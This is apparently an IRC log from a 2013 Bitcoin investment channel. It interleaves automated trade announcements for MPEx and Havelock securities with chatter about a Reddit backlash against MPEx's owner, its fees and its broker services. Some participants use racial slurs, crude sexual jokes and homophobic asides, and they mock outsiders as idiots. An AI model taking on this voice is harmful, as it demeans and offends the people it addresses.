[S.MPOE] 258 @ 0.00068438 = 0.1766 BTC [-] Feb 06 16:31:35 lol Feb 06 16:32:07 mircea_popescu how old are you? you must be pushing 50 Feb 06 16:32:17 i am pushing 50 in the shape of two 25yos Feb 06 16:32:26 lol Feb 06 16:32:49 25 + 25 = 50 Feb 06 16:32:53 omg a revelation! Feb 06 16:33:22 double d's + shapely c's = titsoup. Feb 06 16:35:46 [MPEX] [S.MPOE] 18542 @ 0.00068438 = 12.6898 BTC [-] Feb 06 16:35:47 [MPEX] [S.MPOE] 3458 @ 0.00068225 = 2.3592 BTC [-] Feb 06 16:35:48 If you want clear evidence of the insanity, the Apple Store requires that you register with govt if your app uses any crypto (including https, some people ignore that but some have written blog posts about trying to follow the rules) UNLESS your app is for banking/financial transactions, then you are exempt from registering and providing algos, code, descriptions, etc of your app's use of crypto. Figure that one Feb 06 16:37:29 My favorite neurosurgeon :P Feb 06 16:37:35 [MPEX] [S.MPOE] 492 @ 0.00068225 = 0.3357 BTC [-] Feb 06 16:37:37 [MPEX] [S.MPOE] 2500 @ 0.00068115 = 1.7029 BTC [-] Feb 06 16:37:37 locked out of his name Feb 06 16:37:38 [MPEX] [S.MPOE] 4321 @ 0.00068043 = 2.9401 BTC [-] Feb 06 16:37:39 [MPEX] [S.MPOE] 9337 @ 0.00068042 = 6.3531 BTC [-] Feb 06 16:37:47 too lazy to ghost Feb 06 16:38:31 cuttin' up mouse brains all day is exhausting you deserve it Feb 06 16:38:47 but in all seriousness I do admire your background in biology Feb 06 16:39:54 [MPEX] [S.DICE] 450 @ 0.00620895 = 2.794 BTC [+] Feb 06 16:41:34 Bugpowdurr is a neurosurgeon, i was getting a degree in bioinformatics. Biochemistry is one of the most fascinating things in the universe non? Feb 06 16:41:45 [MPEX] [S.MPOE] 14156 @ 0.00068042 = 9.632 BTC [-] Feb 06 16:41:48 Or do you hate on biology as well EskimoBob ? Feb 06 16:42:49 http://blockchain.info/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Feb 06 16:43:54 [MPEX] [S.MPOE] 2766 @ 0.00069996 = 1.9361 BTC [+] Feb 06 16:43:56 [MPEX] [S.MPOE] 1034 @ 0.00069997 = 0.7238 BTC [+] Feb 06 16:44:33 [MPEX] [S.MPOE] 16807 @ 0.00068042 = 11.4358 BTC [-] Feb 06 16:45:37 neurosurgeon? amazing Feb 06 16:45:47 mouse neurosurgeon* Feb 06 16:45:52 bleh Feb 06 16:46:05 mice are replaceable humans aren't :P Feb 06 16:46:19 mircea got lots of ppl to debate him now great Feb 06 16:46:29 on reddit? Feb 06 16:46:34 yea Feb 06 16:46:48 unless he considers them stupid ppl Feb 06 16:46:53 which post? Feb 06 16:47:05 http://www.reddit.com/r/Bitcoin/comments/17zq8j/because_most_people_are_idiots_in_spite_of_never/ Feb 06 16:47:34 not enough hours in the day, so much to do! Feb 06 16:48:13 [BTCTC] [GSDPT] 1000 @ 0.0062 = 6.2 BTC [-] Feb 06 16:48:47 [BTCTC] [GSDPT] 1000 @ 0.0062 = 6.2 BTC [-] Feb 06 16:49:24 lol is it over 100 yet ? Feb 06 16:51:54 He happens to make us a shit-wad of money - my favourite kind of digusting little shit! Feb 06 16:52:16 "The whole point of bitcoin is OPENNESS. FREEDOM. NO GOVERNMENTS. Feb 06 16:52:16 YOU ARE THE OPPOSITE OF THAT. I HATE YOU. GO DIE FUCKER." Feb 06 16:52:18 ahaha Feb 06 16:52:20 [BTCTC] [B.YABMC] 25 @ 0.0242 = 0.605 BTC [+] Feb 06 16:52:31 so basically... lol. Feb 06 16:52:45 [BTCTC] [B.YABMC] 10 @ 0.0241 = 0.241 BTC [-] Feb 06 16:53:52 the stocks never lie, lets see what the shadowy investors of s.mpoe think throughout the day Feb 06 16:54:34 i find the consumer mindset very amusing tho Feb 06 16:56:33 blame america and it's leadership for that, not capitalism :P Feb 06 16:57:27 "I was thinking a real bet could be on the valuation of MPEX. I believe it's worth a lot less than $10 million. I'd have to investigate further, but given that MPEX has under 200 users, and is likely illegal, notwithstanding the fees and the horrendous owner, that it would be worth substantially less than $10 million." Feb 06 16:57:45 just wait till they discover that there's precisely two businesses in btc that made over 10k last month. Feb 06 16:58:04 no miner, no asic vaporware peddler, no etc on that list. Feb 06 16:58:07 oh my need tough skin for this business im gonna say Feb 06 16:58:53 "given teh horrendous owner" hehe Feb 06 16:59:28 little old me ?! Feb 06 16:59:41 im assuming so Feb 06 16:59:54 im curious what happens once they're done agreeing with each other. Feb 06 17:00:03 cirlce jerk Feb 06 17:00:22 [MPEX] [S.MPOE] 4651 @ 0.00068037 = 3.1644 BTC [-] Feb 06 17:00:26 [MPEX] [S.MPOE] 4321 @ 0.00068403 = 2.9557 BTC [+] Feb 06 17:00:27 [MPEX] [S.MPOE] 2422 @ 0.00068404 = 1.6567 BTC [+] Feb 06 17:01:04 no homo. Feb 06 17:03:25 lots of allegations mircea what say u in defense Feb 06 17:05:15 [MPEX] [S.MPOE] 16517 @ 0.00068404 = 11.2983 BTC [+] Feb 06 17:06:13 in my what ? Feb 06 17:06:44 [MPEX] [S.MPOE] 1246 @ 0.00068404 = 0.8523 BTC [+] Feb 06 17:06:46 [MPEX] [S.MPOE] 4321 @ 0.00069191 = 2.9897 BTC [+] Feb 06 17:06:46 well let me start at the top Feb 06 17:06:47 [MPEX] [S.MPOE] 12900 @ 0.00069192 = 8.9258 BTC [+] Feb 06 17:07:41 "Incoming Bitcoin that doesn't exactly match a quoted sum will be simply kept, reported as profits and distributed to MPEx shareholders." small scale scam? Feb 06 17:08:02 reading the n....homeowners... Feb 06 17:08:54 so much to read so little time Feb 06 17:09:15 so whyd peopel invest with at theif! Feb 06 17:09:56 I'm a little out of the loop, but so far it seems like the only accusation on mp is that he isn't kind to people he doesn't like, is that right? Feb 06 17:10:38 he doesnt like stupid ppl Feb 06 17:10:39 truffles o, that was some drama you missed out on i guess, with the rota and whatnot. Feb 06 17:11:03 bob: huh? Feb 06 17:11:08 mk let me dig it up Feb 06 17:11:27 http://trilema.com/2013/rota-post-mortem/ Feb 06 17:11:34 follow the links, it's prolly 10`000 words at the least. Feb 06 17:12:14 EskimoBob: don't you own some S.DICE shares? Feb 06 17:12:30 probly asking too much, but why is there a court at all? Feb 06 17:13:08 to give negative ratings? Feb 06 17:13:18 mircea no way im reading 10k words ! Feb 06 17:13:21 tl dr Feb 06 17:14:27 so is eskino the guy that lost the 130btc? Feb 06 17:14:59 EskimoBob and this abc523 guy from Reddit both have Mircea Popescu Derangement Syndrome Feb 06 17:16:20 where does this court get any authority? Feb 06 17:16:22 you're so obsessed with MP that you''ve gone insane Feb 06 17:17:20 He's got you on ignore, it's like you're yelling at a wall…. very sad Feb 06 17:17:29 ThickAsThieves it was a sort of an experiment. Feb 06 17:18:00 the court thing seems more like a court of public opinion, isn't that the worst kind Feb 06 17:18:13 i guess it unwittingly worked out like that or something. Feb 06 17:18:16 hey, we all make mistakes. Feb 06 17:18:29 i cant see how they could have any real authority or business in other people's bitcoin matters Feb 06 17:18:38 that's the risk in bitcoin Feb 06 17:18:41 well, all authority in bitcoin is by competence Feb 06 17:18:46 be very VERY good, people will bow to you Feb 06 17:18:53 (and obviously redditors will spazz) Feb 06 17:19:25 speaking of which, 104 comments... i guess i win the bet. pity nobody made it Feb 06 17:19:25 the first time i had to send that exact amount, i was scared Feb 06 17:19:32 so i checked myself like 5 times Feb 06 17:19:41 and no issue Feb 06 17:20:02 gpg is like that too. crazy the 1st time Feb 06 17:20:05 then you forget its there Feb 06 17:20:10 [MPEX] [S.MPOE] 2764 @ 0.00069934 = 1.933 BTC [+] Feb 06 17:20:12 [MPEX] [S.MPOE] 4843 @ 0.00069997 = 3.39 BTC [+] Feb 06 17:20:14 while your rule might be unnecessary on some level, it's your platform, your rules Feb 06 17:20:15 [MPEX] [S.MPOE] 1643 @ 0.00069998 = 1.1501 BTC [+] Feb 06 17:20:27 there's very good reasons for it. Feb 06 17:20:43 i can think of some, sure Feb 06 17:20:47 what is the main one? Feb 06 17:21:17 :-( such trollery on this channel now Feb 06 17:21:20 single address allows actual btc anonymity Feb 06 17:21:28 but it requires ppl to be identified somehiw. Feb 06 17:21:28 just vote with your coins Feb 06 17:21:36 you don't want to invest, don't Feb 06 17:22:32 indeed Feb 06 17:27:34 "I'm just, I don't know how I feel about all of this shit. Feb 06 17:27:34 I understand the concept between differentiating the broker and exchange. This is an obvious concept. My problem was that I couldn't find a broker for a while. I wasn't aware of their existence until very recently. " Feb 06 17:27:39 ahaha maximian you've saved a soul. Feb 06 17:27:55 the poor guy, he made 50 posts out of sheer frustration... but then he never heard of coinbr. Feb 06 17:27:57 not gonna mkae it past teh 10th comment Feb 06 17:28:33 tl dr verison says " He got two emails telling him the fees are too high and now calls everyone an idiot that "shouldn’t be alive". Feb 06 17:28:33 yep, I'm trying the gentle touch Feb 06 17:28:59 I don't think the fees are high at all Feb 06 17:29:00 the gentle touch always works wonders after mpoe-pr has tore them a few new assholes Feb 06 17:29:04 at least from what i've seen Feb 06 17:29:21 expecially considering that you allow passthroughs to be set up Feb 06 17:29:28 especially* Feb 06 17:29:40 good cop/bad cop Feb 06 17:30:55 "I find it comfortable that even millionaires like him are apparently not happy or at peace with the world and life." mo money mo probs Feb 06 17:30:59 I don't even know why I"m trying… pearls to swine Feb 06 17:31:13 I'm like the anti-MPOE-PR Feb 06 17:31:13 k thats all on that for me.. Feb 06 17:31:38 .g mpex broker Feb 06 17:31:50 how is it done? Feb 06 17:31:55 ;;google mpex broker Feb 06 17:31:56 About CoinBr: ; [ANN]First online MPEx brokerage now in public beta: ; MPEx - Bitcoin: Feb 06 17:31:58 !ticker h sdice Feb 06 17:32:01 [HAVELOCK:SDICE] 1D: 0.56500000 / 0.60291089 / 0.75490000 (1769 shares, 1066.54935876 BTC), 7D: 0.52100000 / 0.67572383 / 0.89000000 (3932 shares, 2656.94611605 BTC), 30D: 0.44000000 / 0.62034397 / 0.89000000 (7378 shares, 4576.89783600 BTC) Feb 06 17:35:13 jurov : "They aren't publicized well. So I thought the only way to buy shares was through going on mpex. Pretty logical conclusion to draw, really. This is all a wild wild west." Feb 06 17:35:26 your failure to adequately advertise has caused the cratering of reddit! Feb 06 17:36:03 heh. Feb 06 17:36:13 lol Feb 06 17:36:33 but srsly, the guy on reddit didn't have enough of a clue to search for something logical Feb 06 17:36:37 you need "buy sdice" Feb 06 17:36:42 or "herpderp" Feb 06 17:36:49 "mpex broker" is for a different crowd. Feb 06 17:36:54 i do add comments about coinbr where necessary, just i often came late, outside reddit attention span Feb 06 17:37:13 ;;google herpderp Feb 06 17:37:14 Urban Dictionary: herp derp: ; Harp Darp / Herp Derp | Know Your Meme: ; Herp Derp YouTube Comments | Tanner's Website: Feb 06 17:37:32 prolly the only keyword that makes money atm Feb 06 17:38:08 mircea_popescu: his pattern (abc523) is to freak out and write a million angry comments, then learn some kernel of truth that calms him down, then write a mea culpa, then delete his comments. Feb 06 17:38:19 ill gladly license teh code to someone who will operate mpex brokerage with herpderp SEO Feb 06 17:38:33 He did it the other day in the thread about the new s.dice branch at 0.044 Feb 06 17:38:36 maximian o, you know him ?! Feb 06 17:39:14 know, I just remember him from a couple of days ago… went ballistic about the s.dice price being 0.0044, then spoke with evoorhees on Skype, then calmed down Feb 06 17:39:20 lol Feb 06 17:39:26 erik does have this property Feb 06 17:39:35 [MPEX] [S.MPOE] 2678 @ 0.00069998 = 1.8745 BTC [+] Feb 06 17:39:37 [MPEX] [S.MPOE] 19422 @ 0.00069999 = 13.5952 BTC [+] Feb 06 17:39:50 i imagine we see here at work the alienation of postmodern society Feb 06 17:40:11 people so far removed from human contact they are going ballistic much like a dog stuck locked in a basement or something Feb 06 17:40:39 [BTCTC] [GSDPT] 85 @ 0.0062 = 0.527 BTC [-] Feb 06 17:40:45 i'm looking forward to the day when i'll gleefully post this to reddit: http://live.coinbr.com/images/Reddit_20121016_Trading%20on%20biggest%20bitcoin%20stock%20exchange%20now%20easy.png Feb 06 17:42:17 i just had to make the screenhot how cordially it was welcomed by "teh community" Feb 06 17:43:51 [MPEX] [S.MPOE] 3833 @ 0.00069907 = 2.6795 BTC [-] Feb 06 17:43:53 [MPEX] [S.MPOE] 4321 @ 0.0006894 = 2.9789 BTC [-] Feb 06 17:43:56 [MPEX] [S.MPOE] 7896 @ 0.00068939 = 5.4434 BTC [-] Feb 06 17:48:08 [MPEX] [S.MPOE] 4321 @ 0.00069998 = 3.0246 BTC [+] Feb 06 17:48:09 [MPEX] [S.MPOE] 6517 @ 0.00069999 = 4.5618 BTC [+] Feb 06 17:50:32 lol. why the need for a broker ?!?!?!? Feb 06 17:50:40 omg MPEx fees and gpg and asshole MP!!!!!!1 Feb 06 17:56:44 +1 Feb 06 17:56:46 lol Feb 06 17:58:38 [BTCTC] [GSDPT] 2000 @ 0.0062 = 12.4 BTC [-] Feb 06 17:59:33 evoorhees: any decision on the price of the next tranche? Feb 06 17:59:43 i recall seeing 62 Feb 06 17:59:50 ok, missed that Feb 06 18:01:01 maximian: https://bitcointalk.org/index.php?topic=101902.msg1507018#msg1507018 Feb 06 18:01:12 thx Feb 06 18:01:22 [MPEX] [S.MPOE] 22100 @ 0.00069999 = 15.4698 BTC [+] Feb 06 18:01:50 [MPEX] [O.BTCUSD.P260T] 322 @ 0.25536656 = 82.228 BTC [-] Feb 06 18:04:26 https://bitcointalk.org/index.php?topic=124441.msg1337606#msg1337606 Feb 06 18:04:39 learning is fun@ Feb 06 18:04:40 ! Feb 06 18:06:39 [MPEX] [S.MPOE] 11050 @ 0.00069999 = 7.7349 BTC [+] Feb 06 18:11:03 hehe Feb 06 18:11:11 new people have so much to read as it is... Feb 06 18:11:17 i wonder how bitcoin will be in 2100 Feb 06 18:11:22 terrabytes of accumulated history... Feb 06 18:11:59 replaced by amazon coins by 2050 Feb 06 18:12:19 lol such fail that amazon thingy. Feb 06 18:13:00 i bet it will be easier to understand Feb 06 18:14:42 does it have a blockchain ? Feb 06 18:14:57 look at 2015 Feb 06 18:15:01 more safe Feb 06 18:15:10 dunno Feb 06 18:15:41 ya well, store coupons aren't competition for bitcoin any more than chowchows are antitank weapons. Feb 06 18:17:21 depends how fast the chowchow is moving Feb 06 18:17:34 i posit that no matter how fast it is moving Feb 06 18:17:38 it still won't penetrate armor Feb 06 18:17:42 dunno whats a chowchow Feb 06 18:17:45 20km/s ought to do it : Feb 06 18:17:52 chowchow from outer space Feb 06 18:17:59 http://blog.sfgate.com/pets/2009/11/06/breed-of-the-week-the-chow-chow/ this Feb 06 18:19:17 ahh im more of a cat person Feb 06 18:19:28 actually that's a good question for xkcd's What If? section: Would a chowchow moving at 20km/s penetrate the armor of an Abrams tank? Feb 06 18:20:02 i think we can safely asume that since solid steel won't perforate modern armor Feb 06 18:20:05 neither will a dog. Feb 06 18:20:22 there has to be some speed where it would Feb 06 18:20:22 [MPEX] [S.MPOE] 3111 @ 0.00069252 = 2.1544 BTC [-] Feb 06 18:20:35 nah cause the composite ceramic stuff makes it crack up and break apart Feb 06 18:20:52 obviously there is some size where a 500 ton projectile flatens the tank anyway Feb 06 18:20:59 though meteor effect if nothing else Feb 06 18:21:16 but i never saw a 500 ton chowchow Feb 06 18:21:16 [MPEX] [S.MPOE] 1210 @ 0.00069252 = 0.8379 BTC [-] Feb 06 18:21:18 [MPEX] [S.MPOE] 2690 @ 0.00069247 = 1.8627 BTC [-] Feb 06 18:21:22 tho it'd be quite the sight Feb 06 18:22:23 a hilarious/frightening sight Feb 06 18:24:36 500 ton chow chow Feb 06 18:25:08 more like chomp chomp Feb 06 18:25:18 with metal bones. Feb 06 18:27:01 czech animation character - Maxidog Feek : http://www.pohadkar.cz/pohadka/maxipes-fik/obrazky/id/1166/ Feb 06 18:28:13 if all goes well today, I should have 1800 or so S.DICE shares. what the hell should I do with them? Feb 06 18:28:14 tho it looks more like 50ton. not 500 Feb 06 18:28:22 [MPEX] [S.MPOE] 4321 @ 0.00069975 = 3.0236 BTC [+] Feb 06 18:28:24 [MPEX] [S.MPOE] 530 @ 0.00069999 = 0.371 BTC [+] Feb 06 18:28:26 Clifford, the big red Dog Feb 06 18:28:27 DeadWeasel_, retire Feb 06 18:28:32 ha Feb 06 18:28:54 maybe s.dice starts accepting gambling in its own shares Feb 06 18:29:02 that'd be infinite power. Feb 06 18:29:23 feedback loop of profit Feb 06 18:30:24 tie bitcoin to poker insta boom Feb 06 18:30:25 yea that can be done easily. erik buys 50 or so mpex addresses Feb 06 18:30:37 and tell peeps to PUSH the shares Feb 06 18:30:45 and paste the cert Feb 06 18:31:00 and then hashes the cert as if it were a deposit Feb 06 18:31:13 jesus fuck this can actually be done Feb 06 18:31:23 he'll need to see source address somehow Feb 06 18:31:38 he could use that method for new tranches :) Feb 06 18:31:43 jurov as long as he has a cert... Feb 06 18:32:04 then shareholders get shares as winnings Feb 06 18:32:13 this stuff is so crazy... Feb 06 18:33:01 Can someone tell MP to stop ignoring me for a couple of seconds? Feb 06 18:33:12 sounds rly complicated, but make it happen Feb 06 18:33:29 DeaDTerra1: we can translate Feb 06 18:33:34 oki ^^ Feb 06 18:33:41 I want to open up a second MPEX account :) Feb 06 18:34:00 you just send email, no? Feb 06 18:34:08 [MPEX] [S.MPOE] 4321 @ 0.00069271 = 2.9932 BTC [-] Feb 06 18:34:09 30 btc please Feb 06 18:34:09 [MPEX] [S.MPOE] 16306 @ 0.00069247 = 11.2914 BTC [-] Feb 06 18:34:16 [MPEX] [S.MPOE] 504 @ 0.00068939 = 0.3475 BTC [-] Feb 06 18:34:18 [MPEX] [S.MPOE] 7369 @ 0.00068874 = 5.0753 BTC [-] Feb 06 18:34:42 [BTCTC] [GSDPT] 12000 @ 0.0062 = 74.4 BTC [-] Feb 06 18:34:43 he doesn't ignore your email I hope (unless yo fail the idiot proof he imposed today) Feb 06 18:34:58 [MPEX] [S.MPOE] 4321 @ 0.00069985 = 3.0241 BTC [+] Feb 06 18:35:00 [MPEX] [S.MPOE] 5715 @ 0.00069999 = 4.0004 BTC [+] Feb 06 18:35:13 I don't mind paying 30 BTC Feb 06 18:35:16 haha okay :P Feb 06 18:35:23 I will send him a email then ^^ Feb 06 18:35:58 mircea_popescu: that was DeaDTerra, he's going to open second mpex acct Feb 06 18:39:59 [MPEX] [S.MPOE] 3500 @ 0.00069693 = 2.4393 BTC [-] Feb 06 18:40:01 [MPEX] [S.MPOE] 50100 @ 0.0007 = 35.07 BTC [+] Feb 06 18:40:40 wow havelock is filling up with bids for tonight already Feb 06 18:40:46 sweet Feb 06 18:41:32 [MPEX] [S.MPOE] 8976 @ 0.0007 = 6.2832 BTC [+] Feb 06 18:45:10 oh something is happening tonight Feb 06 18:45:13 do tell Feb 06 18:45:35 why are their so many orders on Havelock at over .0062? it's cheaper on the other exchanges Feb 06 18:45:42 is it just lack of awareness? Feb 06 18:45:44 [MPEX] [S.MPOE] 4321 @ 0.00068902 = 2.9773 BTC [-] Feb 06 18:45:46 [MPEX] [S.MPOE] 9631 @ 0.00068874 = 6.6333 BTC [-] Feb 06 18:45:52 [MPEX] [S.MPOE] 1564 @ 0.00068714 = 1.0747 BTC [-] Feb 06 18:46:25 maybe just surplus of btc Feb 06 18:46:30 http://www.havelock.com/ Feb 06 18:46:46 wtf Feb 06 18:47:02 ? Feb 06 18:47:30 https://www.havelockinvestments.com/ Feb 06 18:47:34 there ya go Feb 06 18:48:42 http://mineforeman.com/2013/02/06/can-electric-call-btcfpga-new-asics-fraud/ Feb 06 18:48:44 o o wrong one Feb 06 18:48:44 ty. Feb 06 18:49:44 2013-02-06 08:02:01 5 ฿0.70000000 ฿3.5000 Feb 06 18:49:44 2013-02-06 08:02:01 10 ฿0.70000000 ฿7.0000 Feb 06 18:49:57 trading at 70 in between 55/62 tranches ? Feb 06 18:50:39 haha Feb 06 18:50:49 yea stupid people :p Feb 06 18:50:57 hey guys - I changed the URL for the figures on SD. New spreadsheet is here: https://docs.google.com/spreadsheet/ccc?key=0Aiec3-Eo_yO5dHB2dVdiaEltUHAtTWlBcFhXQVBYeGc#gid=0 Feb 06 18:51:04 (mircea is updating link on mpex page also) Feb 06 18:51:11 just people who don't know what's going on… very casual investors Feb 06 18:51:35 pity glbse destroyed the notion of funds/managers Feb 06 18:51:39 evoorhees: is the old link removed completely? Feb 06 18:51:41 this is exactly what a manager is supposed to do. Feb 06 18:51:56 the old link is now permission-based Feb 06 18:52:03 and I'll probably delete it shortly Feb 06 18:52:45 evoorhees: thanks, updated on havelock sdice fund overview Feb 06 18:52:54 thanks much Feb 06 18:55:16 [MPEX] [S.MPOE] 4321 @ 0.00069683 = 3.011 BTC [+] Feb 06 18:55:18 [MPEX] [S.MPOE] 11900 @ 0.00069678 = 8.2917 BTC [-] Feb 06 18:55:21 ;;calc 1.25*ticker --last] Feb 06 18:55:21 Error: Spurious "]". You may want to quote your arguments with double quotes in order to prevent extra brackets from being evaluated as nested commands. Feb 06 18:55:28 ;;calc 1.25*[ticker --last] Feb 06 18:55:28 26.5539 Feb 06 18:56:26 how can i find the exchange rate for a specific point in time in the past Feb 06 18:56:34 January 27th Feb 06 18:56:56 why did i ask in this channel Feb 06 18:57:28 so many questions.... Feb 06 18:58:30 [MPEX] [S.DICE] 2 @ 0.00620895 = 0.0124 BTC [+] Feb 06 18:58:31 [MPEX] [S.DICE] 50 @ 0.00632911 = 0.3165 BTC [+] Feb 06 18:58:58 jcpham, maybe http://bitcoincharts.com/charts/mtgoxUSD and select the dates? Feb 06 18:59:16 i was really hoping for a gribble query but thanks Feb 06 18:59:30 ;;bc,help Feb 06 18:59:31 Alias bc,24hprc, Alias bc,avgprc, Alias bc,bitpenny, Alias bc,blockdiff, Alias bc,blocks, Alias bc,bounty, Alias bc,btcguild, Alias bc,calc, Alias bc,calcd, Alias bc,convert, Alias bc,deepbit, Alias bc,diff, Alias bc,diffchange, Alias bc,eligius, Alias bc,estimate, Alias bc,fx, Alias bc,gen, Alias bc,gend, Alias bc,help, Alias bc,hextarget, Alias bc,intersango, Alias bc,interval, Alias (2 more messages) Feb 06 18:59:49 ;;more Feb 06 18:59:50 bc,mktcap, Alias bc,nethash, Alias bc,nexttarget, Alias bc,ozcoin, Alias bc,p2pool, Alias bc,p2poolalt, Alias bc,p2pooldiff, Alias bc,prevdiff, Alias bc,prevdiffchange, Alias bc,price, Alias bc,prob, Alias bc,probd, Alias bc,silkroad, Alias bc,sincelastblock, Alias bc,slushpool, Alias bc,spotestimate, Alias bc,stats, Alias bc,tblb, Alias bc,timetonext, Alias bc,totalbc, Alias bc,tslb, Alias (1 more message) Feb 06 18:59:56 /me pulls out shampoo. Feb 06 19:00:05 ;;bc,price Feb 06 19:00:06 Next Price Estimate: 23.396978 | Next Price In About 2 days, 23 hours, 21 minutes, and 54 seconds Feb 06 19:00:11 O.o Feb 06 19:00:20 ;;more Feb 06 19:00:21 bc,wiki, Alias bc,xag, Alias bc,xau, BitcoinData bcstats, BitcoinData totalbc, GPG bcauth, GPG bcregister, and GPG bcverify Feb 06 19:00:48 Better watch out mircea_popescu, they're coming for the mpex "hot wallet": http://www.reddit.com/r/Bitcoin/comments/17zyrc/what_do_you_see_here_oh_just_a_400000_in_a_hot/ Feb 06 19:00:52 thankfully there's always bc,price to rely on Feb 06 19:01:12 [MPEX] [S.MPOE] 12913 @ 0.00069306 = 8.9495 BTC [-] Feb 06 19:01:13 [MPEX] [S.MPOE] 4411 @ 0.00068714 = 3.031 BTC [-] Feb 06 19:01:14 seems it works only for future dates Feb 06 19:01:14 how is that a hot wallet ?! Feb 06 19:01:15 [MPEX] [S.MPOE] 18164 @ 0.00068712 = 12.4808 BTC [-] Feb 06 19:01:16 [MPEX] [S.MPOE] 112 @ 0.0006853 = 0.0768 BTC [-] Feb 06 19:01:21 lol, dunno Feb 06 19:01:28 geniuses they are Feb 06 19:01:49 I'd need to test the response time on the system to be sure (not going to because I don't want to fork over $600 for registration), but I have a feeling it might be hot, or at least the only wallet they use. Feb 06 19:01:50 mircea_popescu: I see where you a coming from with the article on "niggas" Feb 06 19:01:50 lmao Feb 06 19:01:56 ahahaha Feb 06 19:02:02 dude... Feb 06 19:02:05 what can i say anymore. Feb 06 19:02:07 even a nigga don't wanna be a nigga Feb 06 19:02:23 reddit discovers mpex wallet. shit happens Feb 06 19:02:29 mircea_popescu: that's what jay-z would say Feb 06 19:02:46 jurov no, actually, they were all herpderp nobody shouyld trust mpex. then someone pointed out mpex is well trusted Feb 06 19:02:48 spazz ensued. Feb 06 19:03:04 it's only because you haven't been hacked yet Feb 06 19:03:11 or ran off with the money Feb 06 19:03:13 or that. Feb 06 19:03:29 i wouldn't blame you if you did one day Feb 06 19:03:44 eh, and do what with it. Feb 06 19:03:48 mircea_popescu stop being such an elitist and give plebes free accounts already Feb 06 19:03:59 jcpham i offered theymos one. curious if he takes it. Feb 06 19:04:12 awesome Feb 06 19:04:15 theymos doesn't listen though... Feb 06 19:04:22 on his "need ppl to hold forum coins" thread Feb 06 19:04:51 [MPEX] [S.MPOE] 5588 @ 0.0006853 = 3.8295 BTC [-] Feb 06 19:04:56 [MPEX] [S.MPOE] 9112 @ 0.00068408 = 6.2333 BTC [-] Feb 06 19:05:05 but i am really mindboggled... i mean... mpex features are documented ad nauseam i thought Feb 06 19:05:07 seems not ? Feb 06 19:05:44 i think truffles can explain the problem best Feb 06 19:05:46 i find it hard they would traverse your gpg instructions and not read the part about the fee Feb 06 19:05:59 "ima not read 1000 words" Feb 06 19:06:28 i think as time goes by the section in hell for "went through life reading < 1000 words total" is getting crowded Feb 06 19:06:38 [MPEX] [S.MPOE] 3400 @ 0.00069607 = 2.3666 BTC [+] Feb 06 19:06:53 [BTCTC] [GSDPT] 1000 @ 0.0062 = 6.2 BTC [-] Feb 06 19:07:57 lol i just sent some basic information about what i'm doing now to my ex-boss Feb 06 19:08:08 i suspect something similar ensues: http://www.dilbert.com/strips/comic/2012-11-08/ Feb 06 19:08:42 you know, i think you're the only dilbert fan i know Feb 06 19:08:45 i find this fascinanting Feb 06 19:09:00 if i could figure out what thehell bitcoin was id have time to read 10k words Feb 06 19:09:25 but no its some complicated niche nerdfest that us not so stupid ppl haveto wade through Feb 06 19:09:59 it's the wading not the destination. Feb 06 19:10:37 truffles, it's not that. it's that nobody accepted the challenge to explain it properly to non-nerds Feb 06 19:10:49 it can't be don. Feb 06 19:10:50 despite obvious profit Feb 06 19:10:52 +e Feb 06 19:11:03 makes me think of those complicated mortgage backed securites this system Feb 06 19:11:22 http://www.reddit.com/r/Bitcoin/comments/17zq8j/because_most_people_are_idiots_in_spite_of_never/ Feb 06 19:11:31 i love how this article is like 1-2 over/under all the tiem Feb 06 19:11:44 truffles, why would you want to invest into complicated mortgage backed securites??? Feb 06 19:11:57 im saying bitcoins feels like that Feb 06 19:12:18 they are a pyramid scheme dontcha kno Feb 06 19:12:48 maybe Feb 06 19:12:53 really, i'm fighting with myself over every explanation/help i have to add to coinbr Feb 06 19:12:56 https://bitcointalk.org/index.php?topic=141503.0;topicseen Feb 06 19:13:06 whenever things aren't obvious Feb 06 19:13:08 ^ is that what you were talking about Feb 06 19:13:16 and it does pay off Feb 06 19:13:38 sadly not so many ppl want to do it Feb 06 19:14:12 "I think it says a lot about this douche bag that he wants people to pay to read his absolutely horrendous writing. " oh look some ppl think u suck at writing so we shouldnt read it Feb 06 19:14:26 excellent point i must say Feb 06 19:14:56 yea, bitching is easier Feb 06 19:15:12 but you won't feed yourself with it Feb 06 19:15:49 cant say i dont complain about things on the way.. Feb 06 19:17:06 why is my writing horrendous ?! Feb 06 19:17:56 some1 thinks so Feb 06 19:18:00 [MPEX] [S.DICE] 1248 @ 0.00635835 = 7.9352 BTC [+] Feb 06 19:18:22 i didnt read your blog? but seems something to be desired there Feb 06 19:18:28 from what ive seen Feb 06 19:18:32 ;) Feb 06 19:19:05 im like fucking latter days henry miller over here and these bitchez be bitchin'. Feb 06 19:19:43 but in mircea_popescu's version willie lomax shoots himself sooner Feb 06 19:20:11 sooner, slower and wetter. Feb 06 19:20:36 (also arthur != henry) Feb 06 19:21:14 oh oops Feb 06 19:21:18 :) Feb 06 19:21:37 which one was with Marilyn Monroe? Feb 06 19:21:43 i think both. Feb 06 19:21:53 also the whole 3rd scottish grenadiers. Feb 06 19:21:57 yeah Feb 06 19:22:10 not a henry miller reader.. Feb 06 19:22:20 (a horse regiment) Feb 06 19:22:55 wow racey covers Feb 06 19:23:21 i see butts on tropic of cancer Feb 06 19:23:46 this is genuinely news to you ? Feb 06 19:25:30 yea i have my niche interests too not just nerds Feb 06 19:31:02 " His first published book, Tropic of Cancer (1934), was banned in the United States on the grounds of obscenity." Feb 06 19:31:10 is there freedom of speech anywhere? Feb 06 19:31:32 yes. on trilema. Feb 06 19:32:10 really Feb 06 19:32:27 if i go to the archives and start commenting u wont rage delete Feb 06 19:32:55 i never deleted anyone's comments Feb 06 19:33:01 in however many years, 4, 5. Feb 06 19:33:21 first romanian blog to have an actual open comment policy, and one of the few online Feb 06 19:33:42 [BTCTC] [GSDPT] 300 @ 0.0062 = 1.86 BTC [-] Feb 06 19:34:15 at least these channels arent too restrictive Feb 06 19:39:06 [MPEX] [S.MPOE] 10300 @ 0.00068818 = 7.0883 BTC [-] Feb 06 19:41:50 curl -hP Feb 06 19:41:52 ls Feb 06 19:41:58 cd ../../.. Feb 06 19:42:00 >:( Feb 06 19:46:31 what do you have on the server thestringpuller Feb 06 19:47:13 mircea_popescu: its no problem having more than one pending deposit, right? Feb 06 19:47:43 topace_ no problem at all. Feb 06 19:50:09 ;;tslb Feb 06 19:50:17 Time since last block: 3 minutes and 5 seconds Feb 06 19:50:59 [MPEX] [S.MPOE] 4650 @ 0.00069155 = 3.2157 BTC [+] 